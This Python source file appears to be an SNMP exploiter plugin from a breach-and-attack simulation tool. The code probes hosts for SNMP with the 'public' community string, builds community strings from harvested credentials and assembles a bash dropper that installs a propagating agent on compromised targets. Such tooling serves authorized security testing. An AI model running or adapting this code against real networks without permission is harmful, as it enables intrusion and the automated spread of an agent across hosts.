import logging
from functools import partial
from pprint import pformat
from typing import Any, Dict, Sequence, Tuple

# common imports
from common.event_queue import IAgentEventPublisher
from common.types import AgentID, Event
from common.utils.code_utils import del_key

# dependencies to get rid of or internalize
from infection_monkey.exploit import (
    IAgentBinaryRepository,
    IAgentOTPProvider,
    IHTTPAgentBinaryServerRegistrar,
)
from infection_monkey.exploit.tools import all_udp_ports_are_closed
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.i_puppet import ExploiterResult, TargetHost
from infection_monkey.model import MONKEY_ARG
from infection_monkey.network import TCPPortSelector
from infection_monkey.propagation_credentials_repository import IPropagationCredentialsRepository
from infection_monkey.utils.commands import build_monkey_commandline_parameters
from infection_monkey.utils.script_dropper import build_bash_dropper

from .community_string_generator import generate_community_strings
from .snmp_client import SNMPClient
from .snmp_exploit_client import SNMPExploitClient
from .snmp_exploiter import SNMPExploiter
from .snmp_options import SNMPOptions

logger = logging.getLogger(__name__)


# UDP ports that should_attempt_exploit() checks before probing a host; 161 is the
# standard SNMP port
SNMP_PORTS = [161]


def should_attempt_exploit(host: TargetHost, snmp_client: SNMPClient) -> Tuple[bool, str]:
    """
    Decide whether the SNMP exploiter should be run against a host.

    The host is rejected if `all_udp_ports_are_closed()` reports that every port in
    `SNMP_PORTS` is closed, or if requesting the host's system name with the "public"
    community string raises an exception.

    :param host: The host being considered for exploitation
    :param snmp_client: The client used to send the probe request
    :return: A tuple of (should_attempt, reason); `reason` is an empty string when
             `should_attempt` is True
    """
    if all_udp_ports_are_closed(host, SNMP_PORTS):
        return False, "Host has no open SNMP ports"

    try:
        snmp_client.get_system_name(host.ip, "public")
    except Exception as err:
        # Any failure is treated as "no usable SNMP service", but the cause is logged so
        # that an unexpected error is not silently hidden behind the generic reason
        logger.debug(f"SNMP probe of host {host.ip} failed: {err}")
        return False, "Host does not have SNMP enabled"

    return True, ""


class Plugin:
    """
    SNMP exploiter plugin.

    Keeps the objects handed to it at construction time and, when run against a host,
    parses the plugin options, checks whether an exploit should be attempted and hands the
    actual work over to an `SNMPExploiter`.
    """

    def __init__(
        self,
        *,
        plugin_name: str,
        agent_id: AgentID,
        agent_event_publisher: IAgentEventPublisher,
        agent_binary_repository: IAgentBinaryRepository,
        http_agent_binary_server_registrar: IHTTPAgentBinaryServerRegistrar,
        propagation_credentials_repository: IPropagationCredentialsRepository,
        tcp_port_selector: TCPPortSelector,
        otp_provider: IAgentOTPProvider,
        **kwargs,
    ):
        """
        Store every named argument on the instance under a private attribute of the same
        name. Any additional keyword arguments are accepted and ignored.
        """
        # Identity of this plugin and of the agent running it
        self._agent_id = agent_id
        self._plugin_name = plugin_name

        # Collaborators
        self._otp_provider = otp_provider
        self._tcp_port_selector = tcp_port_selector
        self._agent_event_publisher = agent_event_publisher
        self._agent_binary_repository = agent_binary_repository
        self._propagation_credentials_repository = propagation_credentials_repository
        self._http_agent_binary_server_registrar = http_agent_binary_server_registrar

    @staticmethod
    def _failed_result(error_message: str) -> ExploiterResult:
        """Build a result reporting that neither exploitation nor propagation succeeded."""
        return ExploiterResult(
            exploitation_success=False, propagation_success=False, error_message=error_message
        )

    def run(
        self,
        *,
        host: TargetHost,
        servers: Sequence[str],
        current_depth: int,
        options: Dict[str, Any],
        interrupt: Event,
        **kwargs,
    ) -> ExploiterResult:
        """
        Attempt to exploit a host over SNMP.

        :param host: The host to exploit
        :param servers: Passed on to the agent command line that is built for the target
        :param current_depth: The current depth; the agent command line is built with this
                              value plus one
        :param options: Raw plugin options; the "http_ports" key is removed from this
                        dictionary before the rest is parsed into `SNMPOptions`
        :param interrupt: Passed through to `SNMPExploiter.exploit_host()`
        :return: The exploiter's result, or a failed `ExploiterResult` carrying an error
                 message if the options cannot be parsed, the host is skipped, or an
                 exception is raised while exploiting
        """
        # The "http_ports" option is a hack: it is only present because fingerprinters
        # need it, so it is dropped before the options are parsed
        del_key(options, "http_ports")

        try:
            logger.debug(f"Parsing options: {pformat(options)}")
            parsed_options = SNMPOptions(**options)
        except Exception as err:
            parse_error = f"Failed to parse SNMP options: {err}"
            logger.exception(parse_error)
            return self._failed_result(parse_error)

        client = SNMPClient(parsed_options.snmp_request_timeout, parsed_options.snmp_retries)

        worth_attempting, skip_reason = should_attempt_exploit(host, client)
        if not worth_attempting:
            logger.debug(f"Skipping brute force of host {host.ip}: {skip_reason}")
            return self._failed_result(skip_reason)

        try:
            logger.debug(f"Running SNMP exploiter on host {host.ip}")
            known_credentials = self._propagation_credentials_repository.get_credentials()
            community_strings = generate_community_strings(known_credentials)

            exploiter = self._create_snmp_exploiter(client, host, servers, current_depth)
            return exploiter.exploit_host(host, parsed_options, community_strings, interrupt)
        except Exception as err:
            exploit_error = (
                f"An unexpected exception occurred while attempting to exploit host: {err}"
            )
            logger.exception(exploit_error)
            return self._failed_result(exploit_error)

    def _create_snmp_exploiter(
        self,
        snmp_client: SNMPClient,
        target_host: TargetHost,
        servers: Sequence[str],
        current_depth: int,
    ) -> SNMPExploiter:
        """
        Assemble the `SNMPExploiter` used to exploit a single target.

        :param snmp_client: The client wrapped by the `SNMPExploitClient`
        :param target_host: The host used to determine the agent's destination path
        :param servers: Passed to `build_monkey_commandline_parameters()`
        :param current_depth: The current depth; the command line uses this value plus one
        :return: An exploiter wired with the exploit client, the HTTP agent binary server
                 registrar, a dropper-building callable and the OTP provider
        """
        exploit_client = SNMPExploitClient(
            self._agent_id, self._agent_event_publisher, self._plugin_name, snmp_client
        )

        agent_dst_path = get_agent_dst_path(target_host)
        commandline_parameters = build_monkey_commandline_parameters(
            parent=self._agent_id, servers=servers, depth=current_depth + 1
        )
        agent_args = [MONKEY_ARG, *commandline_parameters]

        # Destination path and arguments are bound now; the exploiter supplies whatever
        # remaining arguments build_bash_dropper() takes
        build_dropper = partial(build_bash_dropper, agent_dst_path, agent_args)

        return SNMPExploiter(
            exploit_client,
            self._http_agent_binary_server_registrar,
            build_dropper,
            self._otp_provider,
        )
